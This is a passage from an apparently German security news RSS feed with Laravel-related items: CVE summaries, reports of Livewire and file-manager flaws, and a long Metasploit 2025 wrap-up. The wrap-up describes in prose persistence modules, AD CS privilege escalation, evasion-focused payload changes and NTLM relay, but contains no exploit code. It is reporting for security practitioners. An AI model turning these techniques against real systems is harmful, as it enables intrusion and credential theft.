<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/malicious-laravel-packages-deploy-php-rat-grant-remote-access-to-attackers/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/malicious-laravel-packages-deploy-php-rat-grant-remote-access-to-attackers/">Malicious Laravel Packages Deploy PHP RAT, Grant Remote Access to Attackers</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Native Apps mit PHP ohne Lizenzkosten – NativePHP öffnet Mobile-Version]]></title>
<description><![CDATA[NativePHP gibt sein Mobile-Framework frei. Ab Version 3 lassen sich native iOS- und Android-Apps mit PHP und Laravel ohne Lizenzkosten entwickeln.]]></description>
<link>https://tsecurity.de/de/3248234/it-nachrichten/native-apps-mit-php-ohne-lizenzkosten-nativephp-oeffnet-mobile-version/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3248234/it-nachrichten/native-apps-mit-php-ohne-lizenzkosten-nativephp-oeffnet-mobile-version/</guid>
<pubDate>Mon, 02 Feb 2026 13:47:18 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[NativePHP gibt sein Mobile-Framework frei. Ab Version 3 lassen sich native iOS- und Android-Apps mit PHP und Laravel ohne Lizenzkosten entwickeln.]]></content:encoded>
</item>
<item>
<title><![CDATA[Developer-Häppchen fürs Wochenende – Kleinere News der Woche]]></title>
<description><![CDATA[Kleine, aber interessante Meldungshäppchen vom News-Buffet zu Python, Rolldown, Godot, Laravel, GPT, Arrow, GStreamer, GitHub, gettext und RISC-V.]]></description>
<link>https://tsecurity.de/de/3245273/it-nachrichten/developer-haeppchen-fuers-wochenende-kleinere-news-der-woche/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3245273/it-nachrichten/developer-haeppchen-fuers-wochenende-kleinere-news-der-woche/</guid>
<pubDate>Sat, 31 Jan 2026 09:17:10 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Kleine, aber interessante Meldungshäppchen vom News-Buffet zu Python, Rolldown, Godot, Laravel, GPT, Arrow, GStreamer, GitHub, gettext und RISC-V.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2020-36950 | Laravel Holdings Laravel Nova 3.7.0 range allocation of resources (Exploit 49198 / EUVD-2020-30865)]]></title>
<description><![CDATA[A vulnerability has been found in Laravel Holdings Laravel Nova 3.7.0 and classified as problematic. This issue affects some unknown processing. Performing a manipulation of the argument range results in allocation of resources.

This vulnerability is reported as CVE-2020-36950. The attack is pos...]]></description>
<link>https://tsecurity.de/de/3240609/sicherheitsluecken/cve-2020-36950-laravel-holdings-laravel-nova-370-range-allocation-of-resources-exploit-49198-euvd-2020-30865/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3240609/sicherheitsluecken/cve-2020-36950-laravel-holdings-laravel-nova-370-range-allocation-of-resources-exploit-49198-euvd-2020-30865/</guid>
<pubDate>Thu, 29 Jan 2026 00:06:10 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/?product.laravel_holdings:laravel_nova">Laravel Holdings Laravel Nova 3.7.0</a> and classified as <a href="https://vuldb.com/?kb.risk">problematic</a>. This issue affects some unknown processing. Performing a manipulation of the argument <em>range</em> results in allocation of resources.

This vulnerability is reported as <a href="https://vuldb.com/?source_cve.343018">CVE-2020-36950</a>. The attack is possible to be carried out remotely. Moreover, an exploit is present.]]></content:encoded>
</item>
<item>
<title><![CDATA[Livewire Filemanager Vulnerability Exposes Web Applications to RCE Attacks]]></title>
<description><![CDATA[A significant security vulnerability has been discovered in Livewire Filemanager, a widely used file management component embedded in Laravel web applications. Tracked as CVE-2025-14894 and assigned vulnerability note VU#650657, the flaw enables unauthenticated attackers to execute arbitrary code...]]></description>
<link>https://tsecurity.de/de/3221429/it-security-nachrichten/livewire-filemanager-vulnerability-exposes-web-applications-to-rce-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3221429/it-security-nachrichten/livewire-filemanager-vulnerability-exposes-web-applications-to-rce-attacks/</guid>
<pubDate>Mon, 19 Jan 2026 14:20:42 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A significant security vulnerability has been discovered in Livewire Filemanager, a widely used file management component embedded in Laravel web applications. Tracked as CVE-2025-14894 and assigned vulnerability note VU#650657, the flaw enables unauthenticated attackers to execute arbitrary code on vulnerable…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/livewire-filemanager-vulnerability-exposes-web-applications-to-rce-attacks/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/livewire-filemanager-vulnerability-exposes-web-applications-to-rce-attacks/">Livewire Filemanager Vulnerability Exposes Web Applications to RCE Attacks</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Livewire Filemanager Vulnerability Exposes Web Applications to RCE Attacks]]></title>
<description><![CDATA[A significant security vulnerability has been discovered in Livewire Filemanager, a widely used file management component embedded in Laravel web applications. Tracked as CVE-2025-14894 and assigned vulnerability note VU#650657, the flaw enables unauthenticated attackers to execute arbitrary code...]]></description>
<link>https://tsecurity.de/de/3221369/it-security-nachrichten/livewire-filemanager-vulnerability-exposes-web-applications-to-rce-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3221369/it-security-nachrichten/livewire-filemanager-vulnerability-exposes-web-applications-to-rce-attacks/</guid>
<pubDate>Mon, 19 Jan 2026 13:50:31 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A significant security vulnerability has been discovered in Livewire Filemanager, a widely used file management component embedded in Laravel web applications. Tracked as CVE-2025-14894 and assigned vulnerability note VU#650657, the flaw enables unauthenticated attackers to execute arbitrary code on vulnerable servers. The vulnerability stems from improper file validation in the LivewireFilemanagerComponent.php component. The tool fails […]</p>
<p>The post <a href="https://cybersecuritynews.com/livewire-filemanager-vulnerability/">Livewire Filemanager Vulnerability Exposes Web Applications to RCE Attacks</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit 2025 Annual Wrap-Up]]></title>
<description><![CDATA[Hard to believe it's that time again, and that Metasploit Framework will see the dawn of another Annual Wrap-Up (and a New Year). All of the metrics and modules you see here would in large part not be possible without the dedicated community members who care about the Framework and its mission on...]]></description>
<link>https://tsecurity.de/de/3195989/it-security-nachrichten/metasploit-2025-annual-wrap-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3195989/it-security-nachrichten/metasploit-2025-annual-wrap-up/</guid>
<pubDate>Mon, 05 Jan 2026 22:53:49 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hard to believe it's that time again, and that Metasploit Framework will see the dawn of another Annual Wrap-Up (and a New Year). All of the metrics and modules you see here would in large part not be possible without the dedicated community members who care about the Framework and its mission on all the days of the year. It is their hard work and dedication that makes it look like magic, and sometimes, it feels like it too. A heartfelt thank you to all of our researchers and contributors, you're what makes Metasploit Framework so resilient.</p><p>This year brought its share of notable vulnerabilities, substantial framework improvements, and continued evolution of the project. Whether you submitted a module, filed an issue, or helped triage a bug, your contributions have kept Metasploit relevant and powerful. So without further ado, let's dive into the highlights from 2025.</p><h2>Persistence Overhaul</h2><p>One of the year's significant infrastructure improvements came from community contributor h00die, who spearheaded a massive refactor of Metasploit's persistence modules. The project, tracked in issue <a href="https://github.com/rapid7/metasploit-framework/issues/20374">#20374</a>, involved reorganizing dozens of persistence modules from their scattered locations across the framework into a dedicated persistence directory under exploits. This wasn't just housekeeping—h00die created a standardized persistence mixin that brought consistency to how modules handle installation, cleanup, and option handling. The refactor touched over 30 modules spanning Linux, Windows, OSX, and multi-platform techniques, modernizing each one with proper check methods, MITRE ATT&amp;CK references, and standardized options like WritableDir. The work also laid the groundwork for a persistence suggester module that can automatically recommend viable persistence techniques based on session characteristics.</p><p>The sheer scope of this effort can't be overstated. Breaking the work into manageable chunks, h00die systematically converted modules from the old post-exploitation style to proper exploit modules with the new persistence mixin, handling everything from cron jobs and SSH keys to Windows registry modifications and service installations. The standardization means that all persistence modules now share common behaviors, produce cleanup scripts in a consistent format, and integrate cleanly with the rest of the framework. It's the kind of unglamorous but essential work that improves the entire framework's usability and maintainability, and we're grateful to h00die for taking on such an ambitious project and seeing it through.</p><h2>AD CS Vulnerable Certificate Template Detection and Exploitation Additions</h2><p>This year, Metasploit expanded its Active Directory Certificate Services (AD CS) coverage by adding detection and exploitation support for certificate templates vulnerable to ESC9, ESC10, and ESC16. Checks for these misconfigured certificate templates were integrated into the existing ldap_esc_vulnerable_template module, allowing users to easily identify misconfigured templates during assessments.</p><p>To complement this detection capability, we introduced the new esc_update_ldap_object module, which enables reliable exploitation of these vulnerable templates to escalate privileges. ESC9, ESC10, and ESC16 share a common pattern: each requires control of a user account with write privileges over another user that is permitted to enroll in the vulnerable template. While exploiting these techniques with other tools typically involves multiple manual and error-prone steps, the new module streamlines the entire workflow. Users configure the required datastore options, run the module, and receive a certificate that can be used to escalate privileges within the domain.</p><p>As part of this effort, we also introduced the ldap_object_attribute module, which provides standard CRUD operations for manipulating LDAP objects in Active Directory. This module — along with existing functionality such as shadow_credentials and get_ticket — is used internally by esc_update_ldap_object to abstract away low-level LDAP interactions and simplify exploitation.</p><p>This work included comprehensive documentation covering the configuration of templates vulnerable to ESC9, ESC10, and ESC16, as well as detailed instructions for exploiting each technique using the new module.</p><h3>Active Directory Improvements</h3><p>Related to our AD CS improvements, came new low-level functionality for interacting with Active Directory (AD) Domain Controllers over LDAP. Over the past couple of years, Metasploit has seen multiple modules added that facilitate AD attack workflows including <a href="https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/admin/ldap/shadow_credentials.md">Shadow Credentials</a>, <a href="https://docs.metasploit.com/docs/pentesting/active-directory/kerberos/rbcd.html">RBCD</a>, <a href="https://docs.metasploit.com/docs/pentesting/active-directory/kerberos/unconstrained_delegation.html">Unconstrained Delegation</a>, etc. Like the AD CS attacks, many of these techniques are reliant on access control to some degree. Over the summer, Metasploit introduced <a href="https://github.com/rapid7/metasploit-framework/pull/20345">new functionality</a> to facilitate checking for these types of attacks. This new library provides Active Directory specific functionality, most notably, the ability to remotely evaluate security descriptors to determine whether a particular user or group has a specific access right. This has already been incorporated into the following modules to either enable or improve the existing detection capabilities.</p><ul><li>auxiliary/admin/ldap/shadow_credentials</li><li>auxiliary/admin/ldap/rbcd</li><li>auxiliary/admin/ldap/ad_cs_cert_template</li><li>auxiliary/gather/ldap_esc_vulnerable_cert_finder</li></ul><p>For module authors, the library provides a composable API for determining if an object grants a particular permission to an optional SID. The SID can be either a user or group, and when omitted is automatically set to the authenticating user, i.e. to check if the current connection has the permissions.</p><p>For example, check if the object grants the read and write property permissions with:</p>adds_obj_grants_permissions?(@ldap, obj, SecurityDescriptorMatcher::Allow.all(%i[RP WP]))<br><h2>Code Cleanup At Scale</h2><p>Beyond new features and modules, 2025 also saw substantial code quality improvements thanks to community contributor bcoles, who took on the often-thankless task of resolving RuboCop violations across the codebase. Throughout the year, bcoles systematically worked through older modules, cleaning up style inconsistencies, fixing syntax violations, and converting outdated property types to proper boolean values in auxiliary scanners and exploit modules. This kind of incremental maintenance work—fixing redundant parentheses here, resolving style violations there—doesn't make for flashy headlines, but it keeps the codebase maintainable and makes life easier for everyone working in the framework. Code quality matters, and we're grateful to bcoles for putting in the work to keep Metasploit's technical debt in check.</p><h2>Payload Improvements</h2><p>It may be a fun fact, or perhaps tribal knowledge that an “exploit” to Metasploit is a module that delivers a payload. All the great exploit content this year would be nothing without corresponding payloads to deliver and we make sure that those get plenty of our time as well. The following changes in particular are highly impactful and may have gone unnoticed while the flashier exploits received all the attention.</p><h3>Windows Meterpreter Improvements</h3><p>The biggest updates for the Windows Meterpreter revolve around two major improvements: the first is the upgrade to ReflectiveDLLInjection, made by Alex (xaitax) Hagenah, for which we express our gratitude for improving this area of the Metasploit Framework that requires a high level of attention to detail. This update introduces full, production-ready ARM64 support and a comprehensive architectural modernization of the whole library. These changes open the door to future support for a native ARM64 Meterpreter on Windows. Additionally, Metasploit split the standard API extension for Windows this year. This was actually the design used in the original Meterpreter implementation and we’ve reconsidered the monolithic approach. This improvement is one of the multiple steps we have in the pipeline to improve the evasion capabilities for our Windows Meterpreter. The standard API library now allows the user to load only specific subcomponents of the extension (for example, the component for network or file-system interaction), reducing the memory footprint for memory scanners. To leverage this new functionality, set AutoLoadStdapi to False, and then load one or more extensions manually, e.g. load stdapi_fs. To maintain backwards compatibility, a single stdapi extension is also still available and can be loaded with load stdapi.</p><h3>Fetch Payload Improvements</h3><p>The first milestone was the introduction of fileless execution for Linux fetch payloads, enabling payloads to run directly from memory using anonymous files. This advancement greatly enhances operational stealth by minimizing forensic traces and avoiding file-based detection, with careful attention to safe, opt-in behavior and collaborative code refinement. Following this, the FETCH_PIPE option streamlined payload deployment into a single, compact command. This improvement enhanced both usability and evasion, while also supporting larger, more complex command payloads (such as fileless execution) to be executed even with reduced command size. Additionally, fetch payload support has expanded to seven additional CPU architectures: aarch64, armbe, armle, mipsbe, mipsle, ppc, and ppc64le. This significantly broadens Metasploit's reach across embedded and legacy systems. Both features are thoroughly tested and future-proof, making the framework more versatile and powerful.</p><h3>New Architectures Basic Support</h3><p>This year, we have also updated the framework to support new basic payloads. We have introduced the exec payload for Windows ARM64 (provided by Alex (xaitax) Hagenah), reverse shell for RISC-V 32 and 64 bit, and Loongarch64 (both provided by bcoles).</p><h3>COMING SOON</h3><p>As much as we try, everything doesn’t always fit into one year. With that in mind, we wanted to highlight some upcoming features that we’re particularly excited to complete in the coming months.</p><h4>Malleable C2</h4><p>The malleable c2 will allow the user to specify with a .profile scribing how the HTTP requests between meterpreter and metasploit-framework should look like, allowing metasploit to hide the distinctive traffic generated by the session communication.</p><h4>Direct Syscall in Metsrv</h4><p>We have updated the Meterpreter core (metsrv) to remove common static signatures, such as specific strings and function imports, making it harder to detect.</p><h4>PoolParty for 32-bit systems</h4><p>Additional work to port the poolparty injection on native 32 bit system, Huge thanks to xHector1337 for taking over the research and extension of the code injection for the new architecture.</p><h2>SCCM Modules</h2><p>This year, Metasploit added two modules for targeting SCCM instances and recovering the Network Access Account credentials. These modules differ in how they perform the authentication. The first, auxiliary/admin/sccm/get_naa_credentials accepts credentials from the operator and will use them to authenticate and run the attack on demand. This pairs nicely with the auxiliary/admin/dcerpc/samr_account module when the operator can create a new machine account. However, when that’s not an option, Metasploit still has you covered with the auxiliary/server/relay/relay_get_naa_credentials variant that enables relaying NTLM authentication from an SMB server. These attack workflows were demonstrated at Black Hat and DEF CON over the summer and we anticipate they’ll remain useful in the future.</p><h2>Module Highlights</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20713">CVE-2025-9316, CVE-2025-11700 N-able N-Central XXE</a> – N-able N-Central is a popular Remote Monitoring and Management (RMM) platform. These two vulnerabilities, when combined, enable Metasploit to read local files without authenticating. This can be used to obtain a number of sensitive backup files from the application itself, or anything else on the host system. XXE attacks are a less common vulnerability, at least in Metasploit-land but this is a fantastic example of how impactful they can be.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20112">CVE-2025-22457 Ivanti Connect Secure Unauthenticated RCE</a> – Ivanti RCEs are always valuable and this module shows that memory corruption lives on in 2025. Not only is this exploit unauthenticated and reliable, it is a great example of how ROP chains can be used.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/19897">CVE-2024-55555 Invoice Ninja RCE</a> – This particular module leverages a PHP deserialization vulnerability within the application. While this vulnerability requires knowledge of the APP_KEY, successful exploitation could have significant financial implications. As an added bonus, this module came with a new library adding support for Laravel Framework-specific cryptography methods.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/19950">CVE-2024-55556 InvoiceShelf RCE</a> – Everyone loves a good pairing, and this module continues h00die-gr3y’s work on invoicing software, showing that they’re useful for receiving more than just payments.</li><li>LDAP Password Disclosure – This module has been around for a while, but received some new features in 2025 for targeting Active Directory Domain Controllers. The <a href="https://github.com/rapid7/metasploit-framework/pull/20017">first</a> added support for LAPSv1 and v2, enabling the module to recover the local admin account on systems. Later in the year, a <a href="https://github.com/rapid7/metasploit-framework/pull/20401">second</a> improvement added support for gMSA accounts. This module also pairs nicely with the new <a href="https://github.com/rapid7/metasploit-framework/pull/19832">SMB to LDAP NTLM Relay</a> module we added this year as well.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20409">Microsoft SharePoint ToolPane Unauthenticated RCE (CVE-2025-53770 and CVE-2025-53771)</a></li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20060">Exploit module for CVE-2025-32433 (Erlang/OTP)</a></li></ul><h3>SMB Relay Expansion</h3><p>This year, Metasploit significantly leveled up its relaying capabilities, transforming the framework’s only SMB to SMB relay capability into a powerful engine for lateral movement. Traditionally, SMB relaying was often the domain of standalone external tools, but through the dedicated work of the Metasploit team, these workflows are now seamlessly integrated into the framework</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/19832">SMB to LDAP relay module</a></li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20637">SMB to MSSQL NTLM Relay module</a></li></ul><h2><span>Community Stats Recap</span></h2><p>A huge thank you from the entire Metasploit team to all 66 contributors in 2025. Your contributions and ideas are what continue to improve this tool every year. Notably, 41 of these were first-time contributors who added new code.</p><p>Here are some stats for 2025:</p><ul><li>Number of new modules: 139</li><li>Number of new bug fixes: 133</li><li>Number of new enhancements: 115</li><li>Number of new documentations: 19</li><li>Number of new payload enhancements: 18</li></ul><p>Contributors in 2025 (ordered by count)</p><ul><li>bcoles</li><li>h00die</li><li>Chocapikk</li><li>h00die-gr3y</li><li>Takahiro-Yoko</li><li>h4x-x0r</li><li>smashery</li><li>vognik (new in 2025)</li><li>jvoisin</li><li>xHector1337 (new in 2025)</li><li>jmartin-tech</li><li>mariomontecatine (new in 2025)</li><li>blue0x1 (new in 2025)</li><li>nakkouchtarek (new in 2025)</li><li>molecula2788</li><li>xaitax</li><li>happybear-21 (new in 2025)</li><li>e2002e</li><li>fabpiaf (new in 2025)</li><li>mekhalleh</li><li>JohannesLks (new in 2025)</li><li>BitTheByte (new in 2025)</li><li>todb</li><li>00nx (new in 2025)</li><li>DevBuiHieu (new in 2025)</li><li>SweilemCodes (new in 2025)</li><li>arpitjain099 (new in 2025)</li><li>L-codes</li><li>Zeecka (new in 2025)</li><li>aaryan-11-x</li><li>whotwagner</li><li>lafried (new in 2025)</li><li>sebaspf (new in 2025)</li><li>hantwister (new in 2025)</li><li>tastyrce (new in 2025)</li><li>easymoney322 (new in 2025)</li><li>gardnerapp</li><li>TheBigStonk (new in 2025)</li><li>0xAryan (new in 2025)</li><li>sempervictus</li><li>szymonj99</li><li>Mathiou04</li><li>vultza (new in 2025)</li><li>enty8080 (new in 2025)</li><li>SaiSakthidar (new in 2025)</li><li>Zedeldi (new in 2025)</li><li>stfnw (new in 2025)</li><li>mmacfadden (new in 2025)</li><li>daffainfo (new in 2025)</li><li>HamzaSahin61 (new in 2025)</li><li>survivant (new in 2025)</li><li>uhei</li><li>EchoSl0w (new in 2025)</li><li>jeffmcjunkin</li><li>BenoitDePaoli (new in 2025)</li><li>randomstr1ng</li><li>2tunnels (new in 2025)</li><li>rodolphopivetta (new in 2025)</li><li>RakRakGaming (new in 2025)</li><li>Desiree05 (new in 2025)</li><li>Wopseeion (new in 2025)</li><li>jphamgithub (new in 2025)</li><li>H4k1l (new in 2025)</li><li>fishBone000 (new in 2025)</li><li>xl4635 (new in 2025)</li></ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-65346 | alexusmai laravel-file-manager up to 3.3.1 Extraction path traversal (EUVD-2025-201169)]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in alexusmai laravel-file-manager up to 3.3.1. Affected is an unknown function of the component Extraction Handler. This manipulation causes path traversal.

This vulnerability appears as CVE-2025-65346. The attack may be initiated remotely. T...]]></description>
<link>https://tsecurity.de/de/3142198/sicherheitsluecken/cve-2025-65346-alexusmai-laravel-file-manager-up-to-331-extraction-path-traversal-euvd-2025-201169/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3142198/sicherheitsluecken/cve-2025-65346-alexusmai-laravel-file-manager-up-to-331-extraction-path-traversal-euvd-2025-201169/</guid>
<pubDate>Sat, 06 Dec 2025 08:20:48 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/?kb.risk">critical</a> has been found in <a href="https://vuldb.com/?product.alexusmai:laravel-file-manager">alexusmai laravel-file-manager up to 3.3.1</a>. Affected is an unknown function of the component <em>Extraction Handler</em>. This manipulation causes path traversal.

This vulnerability appears as <a href="https://vuldb.com/?source_cve.334334">CVE-2025-65346</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-13121 | cameasy Liketea 1.0.0 API Endpoint StoreController.php list lng/lat sql injection]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in cameasy Liketea 1.0.0. Impacted is the function list of the file laravel/app/Http/Controllers/Front/StoreController.php of the component API Endpoint. Such manipulation of the argument lng/lat leads to sql injection.

This vulnerabil...]]></description>
<link>https://tsecurity.de/de/3097491/sicherheitsluecken/cve-2025-13121-cameasy-liketea-100-api-endpoint-storecontrollerphp-list-lnglat-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3097491/sicherheitsluecken/cve-2025-13121-cameasy-liketea-100-api-endpoint-storecontrollerphp-list-lnglat-sql-injection/</guid>
<pubDate>Fri, 14 Nov 2025 03:53:02 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">critical</a>, was found in <a href="https://vuldb.com/?product.cameasy:liketea">cameasy Liketea 1.0.0</a>. Impacted is the function <code>list</code> of the file <em>laravel/app/Http/Controllers/Front/StoreController.php</em> of the component <em>API Endpoint</em>. Such manipulation of the argument <em>lng/lat</em> leads to sql injection.

This vulnerability is listed as <a href="https://vuldb.com/?source_cve.332349">CVE-2025-13121</a>. The attack may be performed from remote. In addition, an exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-11443 | JhumanJ OpnForm up to 1.9.3 Forgotten Password /api/password/email information exposure]]></title>
<description><![CDATA[A vulnerability has been found in JhumanJ OpnForm up to 1.9.3 and classified as problematic. This affects an unknown function of the file /api/password/email of the component Forgotten Password Handler. This manipulation causes information exposure through discrepancy.

The identification of this...]]></description>
<link>https://tsecurity.de/de/3027620/sicherheitsluecken/cve-2025-11443-jhumanj-opnform-up-to-193-forgotten-password-apipasswordemail-information-exposure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3027620/sicherheitsluecken/cve-2025-11443-jhumanj-opnform-up-to-193-forgotten-password-apipasswordemail-information-exposure/</guid>
<pubDate>Wed, 08 Oct 2025 11:22:32 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/?product.jhumanj:opnform">JhumanJ OpnForm up to 1.9.3</a> and classified as <a href="https://vuldb.com/?kb.risk">problematic</a>. This affects an unknown function of the file <em>/api/password/email</em> of the component <em>Forgotten Password Handler</em>. This manipulation causes information exposure through discrepancy.

The identification of this vulnerability is <a href="https://vuldb.com/?source_cve.327380">CVE-2025-11443</a>. It is possible to initiate the attack remotely. Furthermore, there is an exploit available.

This issue is currently aligned with Laravel issue #46465, which is why no mitigation action was taken.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-55661 | Laravel Pulse up to 1.3.0 Livewire remembersQueries remember code injection (GHSA-8vwh-pr89-4mw2 / EDB-52319)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Laravel Pulse up to 1.3.0. Affected is the function remember of the file Laravel\pulse\Livewire\Concerns\remembersQueries of the component Livewire. The manipulation leads to code injection.

This vulnerability is traded as CVE-2024-...]]></description>
<link>https://tsecurity.de/de/2916490/sicherheitsluecken/cve-2024-55661-laravel-pulse-up-to-130-livewire-remembersqueries-remember-code-injection-ghsa-8vwh-pr89-4mw2-edb-52319/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2916490/sicherheitsluecken/cve-2024-55661-laravel-pulse-up-to-130-livewire-remembersqueries-remember-code-injection-ghsa-8vwh-pr89-4mw2-edb-52319/</guid>
<pubDate>Thu, 31 Jul 2025 22:38:03 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">critical</a>, was found in <a href="https://vuldb.com/?product.laravel:pulse">Laravel Pulse up to 1.3.0</a>. Affected is the function <code>remember</code> of the file <em>Laravel\pulse\Livewire\Concerns\remembersQueries</em> of the component <em>Livewire</em>. The manipulation leads to code injection.

This vulnerability is traded as <a href="https://vuldb.com/?source_cve.288390">CVE-2024-55661</a>. It is possible to launch the attack remotely. Furthermore, there is an exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel Idea für lau: PhpStorm-Nutzer sparen sich das Extra-Plug-in]]></title>
<description><![CDATA[Laravel Idea ist ab sofort kostenlos in PhpStorm verfügbar. Das Plug-in ergänzt die IDE um Laravel-Features wie Autovervollständigung und Blade-Support.]]></description>
<link>https://tsecurity.de/de/2915091/it-nachrichten/laravel-idea-fuer-lau-phpstorm-nutzer-sparen-sich-das-extra-plug-in/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2915091/it-nachrichten/laravel-idea-fuer-lau-phpstorm-nutzer-sparen-sich-das-extra-plug-in/</guid>
<pubDate>Thu, 31 Jul 2025 10:00:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Laravel Idea ist ab sofort kostenlos in PhpStorm verfügbar. Das Plug-in ergänzt die IDE um Laravel-Features wie Autovervollständigung und Blade-Support.]]></content:encoded>
</item>
<item>
<title><![CDATA[Livewire Flaw Puts Millions of Laravel Apps at Risk of RCE Attacks]]></title>
<description><![CDATA[A critical vulnerability discovered in Livewire, a popular full-stack framework for Laravel applications, exposes millions of web properties to unauthenticated remote command execution attacks. Tracked as CVE-2025-54068, the flaw resides in Livewire versions from 3.0.0-beta.1 up to 3.6.3 and stem...]]></description>
<link>https://tsecurity.de/de/2897827/hacking/livewire-flaw-puts-millions-of-laravel-apps-at-risk-of-rce-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2897827/hacking/livewire-flaw-puts-millions-of-laravel-apps-at-risk-of-rce-attacks/</guid>
<pubDate>Mon, 21 Jul 2025 12:20:14 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A critical vulnerability discovered in Livewire, a popular full-stack framework for Laravel applications, exposes millions of web properties to unauthenticated remote command execution attacks. Tracked as CVE-2025-54068, the flaw resides in Livewire versions from 3.0.0-beta.1 up to 3.6.3 and stems from the way certain component property updates are hydrated, allowing an attacker to inject and […]</p>
<p>The post <a href="https://gbhackers.com/livewire-flaw-of-rce-attacks/">Livewire Flaw Puts Millions of Laravel Apps at Risk of RCE Attacks</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-29931 | laravel-s 3.7.35 Laravel.php file inclusion (Issue 437 / EUVD-2023-1860)]]></title>
<description><![CDATA[A vulnerability was found in laravel-s 3.7.35. It has been rated as critical. Affected by this issue is some unknown functionality of the file /src/Illuminate/Laravel.php. The manipulation leads to file inclusion.

This vulnerability is handled as CVE-2023-29931. Access to the local network is re...]]></description>
<link>https://tsecurity.de/de/2893475/sicherheitsluecken/cve-2023-29931-laravel-s-3735-laravelphp-file-inclusion-issue-437-euvd-2023-1860/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2893475/sicherheitsluecken/cve-2023-29931-laravel-s-3735-laravelphp-file-inclusion-issue-437-euvd-2023-1860/</guid>
<pubDate>Thu, 17 Jul 2025 22:51:40 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.laravel-s">laravel-s 3.7.35</a>. It has been rated as <a href="https://vuldb.com/?kb.risk">critical</a>. Affected by this issue is some unknown functionality of the file <em>/src/Illuminate/Laravel.php</em>. The manipulation leads to file inclusion.

This vulnerability is handled as <a href="https://vuldb.com/?source_cve.232118">CVE-2023-29931</a>. Access to the local network is required for this attack. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[LaRecipe Tool with 2.3M Downloads Found Vulnerable to Full Server Takeover]]></title>
